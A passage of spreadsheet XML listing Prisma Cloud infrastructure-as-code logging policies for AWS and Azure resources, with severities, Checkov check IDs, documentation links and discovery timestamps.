      <c r="P1256" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1256" t="inlineStr"/>
      <c r="R1256" t="inlineStr"/>
      <c r="S1256" t="inlineStr"/>
      <c r="T1256" t="b">
        <v>0</v>
      </c>
      <c r="U1256" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1256" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-route53-zone</t>
        </is>
      </c>
      <c r="W1256" t="inlineStr">
        <is>
          <t>Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones</t>
        </is>
      </c>
      <c r="X1256" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-2-39</t>
        </is>
      </c>
      <c r="Y1256" t="inlineStr"/>
      <c r="Z1256" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_route53_zone"]}</t>
        </is>
      </c>
      <c r="AA1256" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1256" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1256" t="inlineStr">
        <is>
          <t>CKV2_AWS_39</t>
        </is>
      </c>
      <c r="AD1256" t="b">
        <v>1</v>
      </c>
      <c r="AE1256" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1256" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>0557479f-7689-425f-96a5-1d5fe01cf9a3</t>
        </is>
      </c>
      <c r="AI1256" t="inlineStr"/>
      <c r="AJ1256" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1256" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" t="inlineStr"/>
      <c r="B1257" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1257" s="2" t="inlineStr"/>
      <c r="D1257" t="inlineStr"/>
      <c r="E1257" t="inlineStr"/>
      <c r="F1257" t="inlineStr"/>
      <c r="G1257" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1257" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-s3</t>
        </is>
      </c>
      <c r="K1257" t="inlineStr">
        <is>
          <t>S3 buckets do not have event notifications enabled</t>
        </is>
      </c>
      <c r="L1257" t="inlineStr"/>
      <c r="M1257" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1257" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1257" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1257" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1257" t="inlineStr"/>
      <c r="R1257" t="inlineStr"/>
      <c r="S1257" t="inlineStr"/>
      <c r="T1257" t="b">
        <v>0</v>
      </c>
      <c r="U1257" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1257" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1257" t="inlineStr">
        <is>
          <t>Ensure S3 buckets should have event notifications enabled</t>
        </is>
      </c>
      <c r="X1257" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-2-62</t>
        </is>
      </c>
      <c r="Y1257" t="inlineStr"/>
      <c r="Z1257" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA1257" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1257" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1257" t="inlineStr">
        <is>
          <t>CKV2_AWS_62</t>
        </is>
      </c>
      <c r="AD1257" t="b">
        <v>1</v>
      </c>
      <c r="AE1257" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1257" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>b2539159-2b53-4482-bd48-3727f05e9481</t>
        </is>
      </c>
      <c r="AI1257" t="inlineStr"/>
      <c r="AJ1257" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1257" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" t="inlineStr"/>
      <c r="B1258" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1258" s="2" t="inlineStr"/>
      <c r="D1258" t="inlineStr"/>
      <c r="E1258" t="inlineStr"/>
      <c r="F1258" t="inlineStr"/>
      <c r="G1258" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1258" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-s3</t>
        </is>
      </c>
      <c r="K1258" t="inlineStr">
        <is>
          <t>An S3 bucket must have a lifecycle configuration</t>
        </is>
      </c>
      <c r="L1258" t="inlineStr"/>
      <c r="M1258" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1258" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1258" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1258" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1258" t="inlineStr"/>
      <c r="R1258" t="inlineStr"/>
      <c r="S1258" t="inlineStr"/>
      <c r="T1258" t="b">
        <v>0</v>
      </c>
      <c r="U1258" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1258" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1258" t="inlineStr">
        <is>
          <t>Ensure that an S3 bucket has a lifecycle configuration</t>
        </is>
      </c>
      <c r="X1258" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-2-61</t>
        </is>
      </c>
      <c r="Y1258" t="inlineStr"/>
      <c r="Z1258" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA1258" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1258" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1258" t="inlineStr">
        <is>
          <t>CKV2_AWS_61</t>
        </is>
      </c>
      <c r="AD1258" t="b">
        <v>1</v>
      </c>
      <c r="AE1258" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1258" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>1909f7a4-9e19-4606-a40a-1ec9937d14f2</t>
        </is>
      </c>
      <c r="AI1258" t="inlineStr"/>
      <c r="AJ1258" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1258" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" t="inlineStr"/>
      <c r="B1259" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1259" s="2" t="inlineStr"/>
      <c r="D1259" t="inlineStr"/>
      <c r="E1259" t="inlineStr"/>
      <c r="F1259" t="inlineStr"/>
      <c r="G1259" t="b">
        <v>1</v>
      </c>
      <c r="H12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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1259" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-sfn</t>
        </is>
      </c>
      <c r="K1259" t="inlineStr">
        <is>
          <t>State machine does not have X-ray tracing enabled</t>
        </is>
      </c>
      <c r="L1259" t="inlineStr"/>
      <c r="M1259" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1259" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1259" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1259" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1259" t="inlineStr"/>
      <c r="R1259" t="inlineStr"/>
      <c r="S1259" t="inlineStr"/>
      <c r="T1259" t="b">
        <v>0</v>
      </c>
      <c r="U1259" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1259" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-sfn-state-machine</t>
        </is>
      </c>
      <c r="W1259" t="inlineStr">
        <is>
          <t>Ensure State Machine has X-Ray tracing enabled</t>
        </is>
      </c>
      <c r="X1259" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-284</t>
        </is>
      </c>
      <c r="Y1259" t="inlineStr"/>
      <c r="Z1259" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_sfn_state_machine"]}</t>
        </is>
      </c>
      <c r="AA1259" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1259" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1259" t="inlineStr">
        <is>
          <t>CKV_AWS_284</t>
        </is>
      </c>
      <c r="AD1259" t="b">
        <v>1</v>
      </c>
      <c r="AE1259" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1259" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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59" t="inlineStr">
        <is>
          <t>116667a3-152d-405a-8560-77d50c784109</t>
        </is>
      </c>
      <c r="AI1259" t="inlineStr"/>
      <c r="AJ1259" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1259" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" t="inlineStr"/>
      <c r="B1260" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1260" s="2" t="inlineStr"/>
      <c r="D1260" t="inlineStr"/>
      <c r="E1260" t="inlineStr"/>
      <c r="F1260" t="inlineStr"/>
      <c r="G1260" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1260" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-sfn</t>
        </is>
      </c>
      <c r="K1260" t="inlineStr">
        <is>
          <t>Execution history logging is not enabled on the State Machine</t>
        </is>
      </c>
      <c r="L1260" t="inlineStr"/>
      <c r="M1260" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1260" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1260" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1260" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1260" t="inlineStr"/>
      <c r="R1260" t="inlineStr"/>
      <c r="S1260" t="inlineStr"/>
      <c r="T1260" t="b">
        <v>0</v>
      </c>
      <c r="U1260" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1260" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-sfn-state-machine</t>
        </is>
      </c>
      <c r="W1260" t="inlineStr">
        <is>
          <t>Ensure State Machine has execution history logging enabled</t>
        </is>
      </c>
      <c r="X1260" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-285</t>
        </is>
      </c>
      <c r="Y1260" t="inlineStr"/>
      <c r="Z1260" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_sfn_state_machine"]}</t>
        </is>
      </c>
      <c r="AA1260" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1260" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1260" t="inlineStr">
        <is>
          <t>CKV_AWS_285</t>
        </is>
      </c>
      <c r="AD1260" t="b">
        <v>1</v>
      </c>
      <c r="AE1260" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1260" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>2e6b0e13-c0f2-4a33-a3bc-57bb8b2ea6f4</t>
        </is>
      </c>
      <c r="AI1260" t="inlineStr"/>
      <c r="AJ1260" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1260" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" t="inlineStr"/>
      <c r="B1261" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1261" s="2" t="inlineStr"/>
      <c r="D1261" t="inlineStr"/>
      <c r="E1261" t="inlineStr"/>
      <c r="F1261" t="inlineStr"/>
      <c r="G1261" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1261" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-app</t>
        </is>
      </c>
      <c r="K1261" t="inlineStr">
        <is>
          <t>App service does not enable failed request tracing</t>
        </is>
      </c>
      <c r="L1261" t="inlineStr"/>
      <c r="M1261" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1261" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1261" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1261" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1261" t="inlineStr"/>
      <c r="R1261" t="inlineStr"/>
      <c r="S1261" t="inlineStr"/>
      <c r="T1261" t="b">
        <v>0</v>
      </c>
      <c r="U1261" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1261" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-app-service</t>
        </is>
      </c>
      <c r="W1261" t="inlineStr">
        <is>
          <t>Ensure that App service enables failed request tracing</t>
        </is>
      </c>
      <c r="X1261" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-failed-request-tracing</t>
        </is>
      </c>
      <c r="Y1261" t="inlineStr"/>
      <c r="Z1261" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA1261" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1261" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1261" t="inlineStr">
        <is>
          <t>CKV_AZURE_66</t>
        </is>
      </c>
      <c r="AD1261" t="b">
        <v>1</v>
      </c>
      <c r="AE1261" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1261" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>89c672d6-7436-4eb7-9565-e84ab87edc6c</t>
        </is>
      </c>
      <c r="AI1261" t="inlineStr"/>
      <c r="AJ1261" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1261" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" t="inlineStr"/>
      <c r="B1262" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1262" s="2" t="inlineStr"/>
      <c r="D1262" t="inlineStr"/>
      <c r="E1262" t="inlineStr"/>
      <c r="F1262" t="inlineStr"/>
      <c r="G1262" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1262" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-app</t>
        </is>
      </c>
      <c r="K1262" t="inlineStr">
        <is>
          <t>App service disables detailed error messages</t>
        </is>
      </c>
      <c r="L1262" t="inlineStr"/>
      <c r="M1262" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1262" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1262" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1262" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1262" t="inlineStr"/>
      <c r="R1262" t="inlineStr"/>
      <c r="S1262" t="inlineStr"/>
      <c r="T1262" t="b">
        <v>0</v>
      </c>
      <c r="U1262" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1262" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-app-service</t>
        </is>
      </c>
      <c r="W1262" t="inlineStr">
        <is>
          <t>Ensure that App service enables detailed error messages</t>
        </is>
      </c>
      <c r="X1262" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/tbdensure-that-app-service-enables-detailed-error-messages</t>
        </is>
      </c>
      <c r="Y1262" t="inlineStr"/>
      <c r="Z1262" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA1262" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1262" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1262" t="inlineStr">
        <is>
          <t>CKV_AZURE_65</t>
        </is>
      </c>
      <c r="AD1262" t="b">
        <v>1</v>
      </c>
      <c r="AE1262" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1262" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>bda56a63-e57e-4791-8a3e-e620c142cec2</t>
        </is>
      </c>
      <c r="AI1262" t="inlineStr"/>
      <c r="AJ1262" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1262" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" t="inlineStr"/>
      <c r="B1263" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1263" s="2" t="inlineStr"/>
      <c r="D1263" t="inlineStr"/>
      <c r="E1263" t="inlineStr"/>
      <c r="F1263" t="inlineStr"/>
      <c r="G1263" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1263" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-mssql</t>
        </is>
      </c>
      <c r="K1263" t="inlineStr">
        <is>
          <t>Ledger feature is disabled on the database</t>
        </is>
      </c>
      <c r="L1263" t="inlineStr"/>
      <c r="M1263" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1263" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1263" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1263" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1263" t="inlineStr"/>
      <c r="R1263" t="inlineStr"/>
      <c r="S1263" t="inlineStr"/>
      <c r="T1263" t="b">
        <v>0</v>
      </c>
      <c r="U1263" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1263" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-mssql-database</t>
        </is>
      </c>
      <c r="W1263" t="inlineStr">
        <is>
          <t>Ensure that the Ledger feature is enabled on database that</t>
        </is>
      </c>
      <c r="X1263" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/bc-azure-224</t>
        </is>
      </c>
      <c r="Y1263" t="inlineStr"/>
      <c r="Z1263" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_mssql_database"]}</t>
        </is>
      </c>
      <c r="AA1263" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1263" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1263" t="inlineStr">
        <is>
          <t>CKV_AZURE_224</t>
        </is>
      </c>
      <c r="AD1263" t="b">
        <v>1</v>
      </c>
      <c r="AE1263" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1263" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>2f9894aa-fc83-44ce-94bd-e2815263e0af</t>
        </is>
      </c>
      <c r="AI1263" t="inlineStr"/>
      <c r="AJ1263" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1263" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" t="inlineStr"/>
      <c r="B1264" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1264" s="2" t="inlineStr"/>
      <c r="D1264" t="inlineStr"/>
      <c r="E1264" t="inlineStr"/>
      <c r="F1264" t="inlineStr"/>
      <c r="G1264" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1264" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-mssql</t>
        </is>
      </c>
      <c r="K1264" t="inlineStr">
        <is>
          <t>Azure SQL Server audit log retention is not greater than 90 days</t>
        </is>
      </c>
      <c r="L1264" t="inlineStr"/>
      <c r="M1264" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1264" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1264" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1264" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1264" t="inlineStr"/>
      <c r="R1264" t="inlineStr"/>
      <c r="S1264" t="inlineStr"/>
      <c r="T1264" t="b">
        <v>0</v>
      </c>
      <c r="U1264" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1264" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-mssql-server,azure-sql-server</t>
        </is>
      </c>
      <c r="W1264" t="inlineStr">
        <is>
          <t>Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers</t>
        </is>
      </c>
      <c r="X1264" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-3</t>
        </is>
      </c>
      <c r="Y1264" t="inlineStr"/>
      <c r="Z1264" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_mssql_server","azurerm_sql_server"]}</t>
        </is>
      </c>
      <c r="AA1264" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1264" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1264" t="inlineStr">
        <is>
          <t>CKV_AZURE_24</t>
        </is>
      </c>
      <c r="AD1264" t="b">
        <v>1</v>
      </c>
      <c r="AE1264" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1264" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>6b2bdb87-2865-4348-af5d-0b766186bc9d</t>
        </is>
      </c>
      <c r="AI1264" t="inlineStr"/>
      <c r="AJ1264" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1264" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" t="inlineStr"/>
      <c r="B1265" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1265" s="2" t="inlineStr"/>
      <c r="D1265" t="inlineStr"/>
      <c r="E1265" t="inlineStr"/>
      <c r="F1265" t="inlineStr"/>
      <c r="G1265" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1265" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-postgresql</t>
        </is>
      </c>
      <c r="K1265" t="inlineStr">
        <is>
          <t>Server Parameter 'log_retention' is Set to 'OFF' for PostgreSQL Database Server</t>
        </is>
      </c>
      <c r="L1265" t="inlineStr"/>
      <c r="M1265" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1265" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1265" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1265" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1265" t="inlineStr"/>
      <c r="R1265" t="inlineStr"/>
      <c r="S1265" t="inlineStr"/>
      <c r="T1265" t="b">
        <v>0</v>
      </c>
      <c r="U1265" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1265" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-postgresql-configuration</t>
        </is>
      </c>
      <c r="W1265" t="inlineStr">
        <is>
          <t>Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server</t>
        </is>
      </c>
      <c r="X1265" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-logging-policies/azr-logging-146</t>
        </is>
      </c>
      <c r="Y1265" t="inlineStr"/>
      <c r="Z1265" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_postgresql_configuration"]}</t>
        </is>
      </c>
      <c r="AA1265" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1265" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1265" t="inlineStr">
        <is>
          <t>CKV_AZURE_146</t>
        </is>
      </c>
      <c r="AD1265" t="b">
        <v>1</v>
      </c>
      <c r="AE1265" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1265" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>d03be557-ad83-460b-9fa7-56e76953ccb9</t>
        </is>
      </c>
      <c r="AI1265" t="inlineStr"/>
      <c r="AJ1265" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1265" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" t="inlineStr"/>
      <c r="B1266" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1266" s="2" t="inlineStr"/>
      <c r="D1266" t="inlineStr"/>
      <c r="E1266" t="inlineStr"/>
      <c r="F1266" t="inlineStr"/>
      <c r="G1266" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1266" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-storage</t>
        </is>
      </c>
      <c r="K1266" t="inlineStr">
        <is>
          <t>Azure storage account logging setting for blobs is disabled</t>
        </is>
      </c>
      <c r="L1266" t="inlineStr"/>
      <c r="M1266" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1266" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1266" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1266" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1266" t="inlineStr"/>
      <c r="R1266" t="inlineStr"/>
      <c r="S1266" t="inlineStr"/>
      <c r="T1266" t="b">
        <v>0</v>
      </c>
      <c r="U1266" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1266" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-storage-container,azure-storage-account,azure-log-analytics-storage-insights</t>
        </is>
